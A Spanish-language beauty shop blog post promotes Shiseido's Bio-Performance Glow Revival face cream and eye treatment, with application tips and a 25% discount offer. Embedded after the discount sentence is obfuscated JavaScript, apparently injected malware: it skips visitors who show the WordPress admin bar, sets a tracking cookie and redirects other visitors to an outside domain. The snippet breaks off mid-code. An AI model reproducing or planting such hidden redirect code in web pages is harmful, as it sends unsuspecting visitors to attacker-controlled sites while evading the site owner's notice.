Bio Performance Glow Revival Shiseido

Esta semana en Perfumes Tin Tin encontraréis una oferta exclusiva en Shiseido y como no queremos que te pierdas las últimas novedades de la firma aquí venimos a explicároslas.

Esta temporada Shiseido viene cargada de nuevos lanzamientos uno de los más esperados es Bio-Performance Glow Revival.

Una nueva línea de productos multiespecialistas de alto rendimiento que actúan sobre el sistema capilar sanguíneo de la piel, el cual es la clave para resolver múltiples problemas que afectan al aspecto general de la misma.

La crema Bio-Performance Glow Revival nos ayuda a corregir múltiples preocupaciones: tono irregular, rojeces, pigmentación, falta de luminosidad, poros dilatados y arrugas.

Bio-Performance Glow Revival  de Shiseido está indicada para todo tipo de pieles, mujeres que quieran mejorar la apariencia de su piel y sobretodo potenciar la luminosidad. Gracias a su nueva tecnología Renocycle  consigue optimizar los ciclos de regeneración generales de la piel.

product-main-2

Glow Revival Cream  de Shiseido es la primera crema facial multi-especialista que podremos aplicar tanto de día como de noche. Corrige la apariencia general de la piel regenerando los capilares sanguíneos para garantizar su óptimo funcionamiento. Contiene el complejo Spot Deactiv Complex GR que se compone por Extracto de raíz de Peonía y Extracto de Gioh. Mejora la inflamación crónica de las áreas con manchas y elimina la producción y la excesiva actividad de melanina.

¿Qué notaré? Una piel con más energía, un tono más luminoso y vibrante.  En el caso de que tengamos manchas se reducen, las rojeces disminuyen, poros dilatados menos visibles. En definitiva, una piel más suave, lisa y sedosa.

¿Cuándo y cómo la aplico? Mañana y noche después del serum, tomamos una pequeña cantidad de producto en la yema de los dedos y la extendemos suavemente sobre el rostro.

Bio Performance Glow Revival Shiseido Crema

El tratamiento para el contorno de ojos que complementa es Glow Revival Eye de Shiseido, contiene Extracto de Semilla de Coix que ayuda a regular y mantener un corrector intercambio de fluídos entre los capilares sanguíneos y el tejido de la piel para prevenir la aparición de bolsas en la parte inferior de los ojos.

glow revival eye

 

Glow Revival Eye es un tratamiento multi-especialista 24 Horas para el contorno de ojos, con un exclusivo aplicador de masaje Kassa, que repara y regenera el sistema capilar sanguíneo, el cual es clave para resolver múltiples problemas en la zona que rodea los ojos como son el tono irregular, la textura, las ojeras y las bolsas.

¿Qué notaré? La zona del contorno de ojos más luminoso y revitalizado, ojeras minimizadas, bolsas erradicadas, líneas de expresión suavizadas. Notaremos la piel del contorno de ojos más hidratada, suave y sedosa de forma instantánea.

¿Cuándo y cómo la aplico? Mañana y noche como último paso del tratamiento. Tomamos una pequeña cantidad del producto y aplicamos delicadamente con el dedo anular en el área de alrededor de los ojos. Shiseido nos recomienda utiliza la técnica Kassa para maximizar los beneficios del tratamiento. A continuación os dejamos un video explicativo de cómo aplicar este producto siguiendo la técnica de Masaje Kassa.

Su aplicador exclusivo basado en la técnica tradicional de masaje asiático Kassa. Glow Revival Eye de Shiseido es el único tratamiento que trata la regeneración del sistema capilar sanguíneo y la sobreestimulación de melanina en un mismo producto para mejorar al máximo la apariencia general de la piel del contorno de ojos.

Utilizando la tecnología Renocycle System contiene Extracto de Bio-Chai Hu y Cafeína, actúa sobre los factores que controlan las funciones de comprobación y reparación del ADN dañado en el ciclo de división celular.

Shiseido-GR-ojos-W-

El sérum complementa la línea Bio Performance Glow Revival para completar tu ritual de belleza.

Además esta semana y hasta el 13 de Abril tenemos 25% de Descuento en todos los productos de Shiseido, por lo que puedes conseguir Bio-Performance Glow Revival a un precio muy especial. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone